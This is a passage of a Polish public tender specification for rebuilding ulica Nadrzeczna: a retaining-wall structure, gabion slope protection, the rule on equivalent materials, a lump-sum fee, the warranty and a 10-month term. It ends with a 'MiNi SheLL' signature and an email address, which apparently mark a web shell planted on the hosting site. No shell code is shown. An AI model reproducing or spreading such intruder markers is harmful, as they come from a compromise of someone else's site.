-	konstrukcja odciążająca istniejący mur oporowy przy budynku mieszkalnym nr 4 - konstrukcja żelbetowa wykonana wewnątrz korpusu drogowego,
-	zabezpieczenia części skarpy naruszonej w wyniku poszerzenia ulicy - kosze gabionowe. 
II etap 	- przebudowa ulicy Nadrzecznej od 0+000,00 m (początek opracowania) do 0+710,14 m.

Prace należy wykonać zgodnie z posiadanymi przez Zamawiającego projektami technicznymi poszczególnych branż. Dokumentacja techniczna stanowi integralną część SIWZ z zastrzeżeniem, że wszystkie ewentualnie wskazane z nazwy materiały (wyroby) należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ustawy, na wskazane z nazwy materiały i wyroby Zamawiający dopuszcza zastosowanie równoważnych materiałów (wyrobów), nie gorszej jakości niż opisane w projekcie i specyfikacji technicznej wykonania i odbioru robót. Ciężar udowodnienia, że materiał (wyrób) jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę. W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty opisujące parametry techniczne, wymagane prawem certyfikaty i inne dokumenty dopuszczające dane materiały (wyroby) do użytkowania, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne. Szczegółowy zakres i technologię wykonania i odbioru robót określają: 
-	projekty,
-	specyfikacje techniczne wykonania i odbioru robót,
-	przedmiary robót (ze względu na wynagrodzenie ryczałtowe za wykonanie zamówienia przedmiary robót wykonane i dostarczone przez Zamawiającego są jedynie dodatkową podstawą informacyjną - patrz rozdziały C, D niniejszej SIWZ),
stanowiące załączniki do niniejszej SIWZ.
	
Wykonawcy za realizację Zamówienia przysługiwać będzie wynagrodzenie ryczałtowe - patrz rozdział D.
Wszelkie koszty związane z realizacją przedmiotu zamówienia obciążają Wykonawcę. 
Wykonawca jest zobowiązany udzielić na powyższe prace gwarancji na min. 36 miesięcy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com